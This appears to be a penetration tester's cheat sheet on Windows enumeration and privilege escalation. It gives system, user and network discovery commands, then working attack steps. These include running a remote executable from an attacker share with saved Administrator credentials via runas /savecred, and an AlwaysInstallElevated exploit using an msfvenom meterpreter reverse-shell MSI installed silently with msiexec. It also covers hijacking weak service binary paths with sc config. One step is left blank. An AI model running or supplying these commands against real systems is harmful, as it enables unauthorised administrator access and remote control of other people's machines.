Skip to content

Windows Manual Enumeration

System Info


Extract patches and updates

wmic qfe
wmic qfe get Caption, Description, HotFixID, InstalledOn

List all drives

wmic logicaldisk get caption,description,providername

User Info

whoami /priv

Find user accounts

net user [USER]

Find users in group

net localgroup administrators

Network Info

ipconfig /all
arp -a
netstat -ano

Running services

services (by itself)
sc queryex type= service
Get-Service <foo> (Powershell)
Start-Service <foo> (Powershell)

list credentials inside Credential Manager

C:\Windows\System32\spool\drivers\color>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

C:\Windows\System32\spool\drivers\color>runas /savecred /user:ACCESS\Administrator "\\\EVILSMB\kittens.exe"



1.Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer 2.From the output, notice that “AlwaysInstallElevated” value is 1. 3.In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer 4.From the output, notice that “AlwaysInstallElevated” value is 1.


Kali VM

  1. Open command prompt and type: msfconsole
  2. In Metasploit (msf > prompt) type: use multi/handler
  3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
  4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
  5. In Metasploit (msf > prompt) type: run
  6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
  7. Copy the generated file, setup.msi, to the Windows VM.

Windows VM

1.Place ‘setup.msi’ in ‘C:\Temp’. 2.Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi

Enjoy your shell! :)

  • Alternatively, once you have a meterpreter shell, you can use 'exploit/windows/local/always_install_elevated' for your session

Weak service permissions

Check Startup Items for weak file perms

1. Open command prompt and type:  
2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

Check for services we can control

accesschk.exe -uwcv Everyone *

Modify binary path

sc config <service name> binPath= <binary path>
sc qc <service name>